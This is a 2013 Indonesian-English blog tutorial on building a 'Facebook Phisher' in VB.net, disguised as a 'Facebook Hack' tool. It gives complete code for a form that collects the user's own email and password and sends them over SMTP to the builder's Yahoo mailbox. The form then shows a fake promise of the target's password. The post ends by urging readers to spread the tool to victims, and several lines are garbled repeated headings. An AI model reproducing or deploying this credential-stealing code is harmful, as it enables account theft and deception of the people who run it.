Selasa, 16 Juli 2013

How to : Make Facebook Phisher ( VB.net )

05.51


Product by:
Muhammed Ryan
Reviewed by: 
Rating:
5
On July 14, 2013
Last modified:July 14, 2013

Summary:

How to make Facebook Phisher in VB.net - this All-In-One Phisher Facebook asks user for his own account email and passwords
How to  Make Facebook Phisher in VB.net
How to Make Facebook Phisher in VB.net

membutuhkan:


Visual Basic 2010 atau Nanti

komputer

posting ini

persiapan:


ok Buat New Project dan membuat / Buat Proyek Baru dan buat:


TextBox1 (Text "Alamat E-mail Anda"), TextBox2 (Text "Password Anda") dan textbox3 (Text "Target Anda, misalnya gay@yahoo.com").

Button1 (Text "Hack!") Dan tombol2 (Text "Exit").

Form1 (atau judul Teks "Facebook Hack 2013").

1.) Ok sekarang. klik dua kali Form1 dan atas Public Class Form1 Ketik kode ini / KLIK 2 Kali Form1 Dan taruh Kode inisial di Atas Public Class Form1

Imports System.Net.Mail
Imports Microsoft.Win32
How to  Make Facebook Phisher VB.net
How to Make Facebook Phisher ( VB.net )
2.) Double Klik Button1 (Hack!) / KLIK Dua Kali Button1 (Hack1).
How to : Make Facebook Phisher ( VB.net )
How to : Make Facebook Phisher ( VB.net )
And Type /dan ketik :
How to : Make Facebook Phisher ( VB.net )
How to : Make Facebook Phisher ( VB.net )
Dim MyMailMessage As New MailMessage
 MyMailMessage.From = New MailAddress("YourYahooEmail")
 MyMailMessage.To.Add("YourYahooEmail")
 MyMailMessage.Body = ("Username: " + TextBox1.Text & vbCrLf & "Password: " + TextBox2.Text & vbCrLf & vbCrLf & "target: " + TextBox3.Text)
 Dim SMTPServer As New SmtpClient("smtp.yahoo.com.au")
 SMTPServer.Port = 587
 SMTPServer.Credentials = New System.Net.NetworkCredential("YourYahooEmail", "YourYahooPassword")
 SMTPServer.EnableSsl = False
 SMTPServer.Send(MyMailMessage)
 MsgBox("Passwords of your target generated in 24 hours ,please be patien . ill send the password to your e-mail address using your info!")
3.) Double Click Button2 ( Exit ) and type / Klik dua kali Button2 ( exit ) dan ketik :
End
4.) Klik Debug dan Klik Build / KLIK Debug Dan KLIK membangun. Anda Disusun Facebook phisher Terletak di C: \ Users \ PCuserName \ Documents \ Visual Studio 2010 \ Projects \ Facebook \ Facebook \ bin \ Release (facebook adalah nama proyek saya). / Facebook Phisher Yang sudah di Kompilasi berlokasi di C: \ Users \ PCuserName \ Documents \ Visual Studio 2010 \ Projects \ Facebook \ Facebook \ bin \ Release
 5) Sebarkan phisher Facebook Anda dan Lakukan troll / Sebarkan Facebook Phishernya Ke manusia alay: v.
Harapan Anda Love it

Written by

Hidup itu singkat, pergunakanlah hidup anda sebaik mungkin!.

0 komentar:

Posting Komentar

 

© 2013 Azriel notes. All rights resevered. Designed by Templateism

Back To Top